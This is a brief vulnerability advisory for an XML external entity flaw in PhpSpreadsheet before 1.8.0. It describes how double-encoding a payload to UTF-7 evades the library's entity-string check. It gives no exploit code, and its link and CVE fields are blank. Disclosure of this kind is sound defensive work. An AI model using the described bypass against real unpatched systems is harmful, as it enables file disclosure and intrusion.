PHPOffice PhpSpreadsheet before 1.8.0 Improper Restriction of XML External Entity Reference Vulnerability


PHPOffice PhpSpreadsheet before 1.8.0 has an XXE issue. The XmlScanner decodes the sheet1.xml from an .xlsx to utf-8 if something else than UTF-8 is declared in the header. 


The information has been provided by Daniel Hoffmann

The original article can be found at:



This was a security measure to prevent the vulnerability but the fix is not sufficient. By double-encoding the the xml payload to utf-7 it is possible to bypass the check for the string ?<!ENTITY? and thus allowing for an xml external entity processing (XXE) attack.


Vulnerable Systems:

PHPOffice PhpSpreadsheet before 1.8.0 


CVE Information:



Disclosure Timeline:
Published Date:11/7/2019